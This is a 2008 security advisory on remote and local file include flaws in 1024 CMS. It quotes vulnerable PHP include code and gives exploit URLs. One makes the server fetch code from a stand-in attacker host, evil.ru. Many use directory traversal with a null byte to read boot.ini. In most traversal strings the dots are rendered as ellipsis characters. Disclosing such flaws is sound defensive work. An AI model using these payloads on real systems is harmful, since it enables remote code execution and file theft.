Digital Security Research Group [DSecRG] Advisory #DSECRG-08-027
Application: 1024 CMS
Versions Affected: 1.4.3, 1.4.4 RFC
Vendor URL: http://www.1024cms.com/
Bug: Multiple Remote/Local File Include
Exploits: YES
Reported: 18.06.2008
Second report: 27.06.2008
Vendor Response: NONE
Solution: NONE
Date of Public Advisory: 04.07.2008
Author: Digital Security Research Group [DSecRG] (research [at] dsec [dot] ru)
Description
1024 CMS has Remote File Include vulnerability and multiple Local File Include vulnerabilities.
themes/blog/layouts/standard.php
themes/default/layouts/standard.php
themes/portfolio/layouts/standard.php
themes/snazzy/layouts/standard.php
Code
#################################################
<?php include("./themes/".$theme_dir."/layouts/basic_header.php"); ?>
<div class="centerbigtable">
<?php
if(!isset($page_include)) {
if($page_ck['custom'] == '0') include("./pages/".$page."/default/content.php");
else include("./pages/custom/".$page."/default/content.php");
} else include($page_include);
?>
#################################################
Example:
http://[server]/[installdir]/themes/blog/layouts/standard.php?page_include=http://evil.ru/evil.php
http://[server]/[installdir]/themes/default/layouts/standard.php?theme_dir=…/…/…/…/…/…/…/…/…/…/…/…/…/boot.ini%00
http://[server]/[installdir]/themes/snazzy/layouts/standard.php?page=…/…/…/…/…/…/…/…/…/…/…/…/…/boot.ini%00
Multiple Local File Include vulnerabilities:
Code
#################################################
if(isset($_GET['t'])) {
switch($_GET['t']) {
case "forum":
include("…/admin/lang/".$lang."/reports/ops/forum.php");
break;
case "download":
include("../admin/lang/".$lang."/reports/ops/download.php");
break;
case "news":
include("../admin/lang/".$lang."/reports/ops/news.php");
break;
}
} else die("You cannot access this page directly");
#################################################
Example:
http://[server]/[installdir]/admin/lang/fr/reports/default.php?t=news&lang=…/…/…/…/…/…/…/…/…/…/…/…/…/boot.ini%00
admin/ops/admins/default.php
admin/ops/reports/ops/download.php
admin/ops/reports/ops/forum.php
admin/ops/reports/ops/news.php
Code
#################################################
<?php
include("./themes/".$admin_theme_dir."/templates/default_header.tpl");
…
#################################################
Example:
http://[server]/[installdir]/admin/ops/admins/default.php?admin_theme_dir=…/…/…/…/…/…/…/…/…/…/…/…/…/boot.ini%00
http://[server]/[installdir]/admin/ops/reports/ops/news.php?admin_theme_dir=…/…/…/…/…/…/…/…/…/…/…/…/…/boot.ini%00
lang/en/moderator/default.php
lang/fr/moderator/default.php
Code
#################################################
if(isset($_GET['t'])) {
switch($_GET['t']) {
case "forum":
include("./lang/".$lang."/moderator/ops/forum.php");
break;
case "download":
include("./lang/".$lang."/moderator/ops/download.php");
break;
case "gallery":
include("./lang/".$lang."/moderator/ops/gallery.php");
break;
case "news":
include("./lang/".$lang."/moderator/ops/news.php");
break;
}
}
#################################################
Example:
http://[server]/[installdir]/lang/en/moderator/default.php?t=news&lang=…/…/…/…/…/…/…/…/…/…/…/…/…/boot.ini%00
http://[server]/[installdir]/lang/fr/moderator/default.php?t=download&lang=…/…/…/…/…/…/…/…/…/…/…/…/…/boot.ini%00
Code
#################################################
if(isset($_GET['t'])) {
switch($_GET['t']) {
case "forum":
include("./lang/".$lang."/moderator/ops/forum.php");
break;
case "download":
include("./lang/".$lang."/moderator/ops/download.php");
break;
case "news":
include("./lang/".$lang."/moderator/ops/news.php");
break;
}
}
#################################################
Example:
http://[server]/[installdir]/lang/de/moderator/default.php?t=forum&lang=…/…/…/…/…/…/…/…/…/…/…/…/…/boot.ini%00
pages/download/default/ops/add.php
pages/download/default/ops/edit.php
Code
#################################################
if(isset($_SESSION['type']) && ($_SESSION['type'] == '1' || ($_SESSION['type'] == '2' && trim($canpostdown) == "true") || $_SESSION['type'] == '4')) {
…
} else {
if($canpostdown !== 'true') define("CONTENT", POST_DISABLED);
else define("CONTENT", POST_LOGIN);
include("./themes/".$theme_dir."/templates/no_content.tpl");
}
#################################################
Example:
http://[server]/[installdir]/pages/download/default/ops/add.php?theme_dir=…/…/…/…/…/…/…/…/…/…/…/…/…/boot.ini%00
pages/download/default/ops/newest.php
pages/download/default/ops/search.php
pages/download/default/ops/top.php
pages/forum/default/content.php
Code
#################################################
<?php
include("./themes/".$theme_dir."/templates/default_header.tpl");
…
#################################################
Example:
http://[server]/[installdir]/pages/download/default/ops/newest.php?theme_dir=…/…/…/…/…/…/…/…/…/…/…/…/…/boot.ini%00
http://[server]/[installdir]/pages/forum/default/content.php?theme_dir=…/…/…/…/…/…/…/…/…/…/…/…/…/boot.ini%00
themes/blog/layouts/basic_footer.php
themes/default/layouts/basic_footer.php
themes/portfolio/layouts/basic_footer.php
themes/snazzy/layouts/basic_footer.php
Code
#################################################
…
<?php include("./themes/".$theme_dir."/templates/footer.tpl"); ?>
…
#################################################
Example:
http://[server]/[installdir]/themes/blog/layouts/basic_footer.php?theme_dir=…/…/…/…/…/…/…/…/…/…/…/…/…/boot.ini%00
themes/blog/layouts/basic_header.php
themes/default/layouts/basic_header.php
themes/portfolio/layouts/basic_header.php
themes/snazzy/layouts/basic_header.php
Code
#################################################
…
<?php include("./themes/".$theme_dir."/templates/header.tpl"); ?></td>
…
#################################################
Example:
http://[server]/[installdir]/themes/default/layouts/basic_header.php?theme_dir=…/…/…/…/…/…/…/…/…/…/…/…/…/boot.ini%00
themes/blog/layouts/print.php
themes/default/layouts/print.php
themes/portfolio/layouts/print.php
themes/snazzy/layouts/print.php
Code
#################################################
if(!isset($page_include)) {
if($page_ck['custom'] == '0') include("./pages/".$page."/default/content.php");
else include("./pages/custom/".$page."/default/content.php");
} else include("./themes/".$theme_dir."/templates/".$page_include);
include("./themes/".$theme_dir."/templates/footer.tpl");
#################################################
Example:
http://[server]/[installdir]/themes/blog/layouts/print.php?page=…/…/…/…/…/…/…/…/…/…/…/…/…/boot.ini%00
http://[server]/[installdir]/themes/default/layouts/print.php?page_include=…/…/…/…/…/…/…/…/…/…/…/…/…/boot.ini%00
http://[server]/[installdir]/themes/portfolio/layouts/print.php?theme_dir=…/…/…/…/…/…/…/…/…/…/…/…/…/boot.ini%00
themes/blog/layouts/total.php
themes/default/layouts/total.php
themes/portfolio/layouts/total.php
themes/snazzy/layouts/total.php
Code
#################################################
<td><?php include("./themes/".$theme_dir."/templates/header.tpl"); ?></td>
</tr>
<tr>
<td>
<?php
if($page_ck['custom'] == '0') include("./pages/".$page."/default/content.php");
else include("./pages/custom/".$page."/default/content.php");
?>
#################################################
Example:
http://[server]/[installdir]/themes/default/layouts/total.php?theme_dir=…/…/…/…/…/…/…/…/…/…/…/…/…/boot.ini%00
http://[server]/[installdir]/themes/snazzy/layouts/total.php?page=…/…/…/…/…/…/…/…/…/…/…/…/…/boot.ini%00
About
Digital Security is leading IT security company in Russia, providing information security consulting, audit and penetration testing services, risk analysis and ISMS-related services and certification for ISO/IEC 27001:2005 and PCI DSS standards. Digital Security Research Group focuses on web application and database security problems with vulnerability reports, advisories and whitepapers posted regularly on our website.
Contact: research [at] dsec [dot] ru
http://www.dsec.ru (in Russian)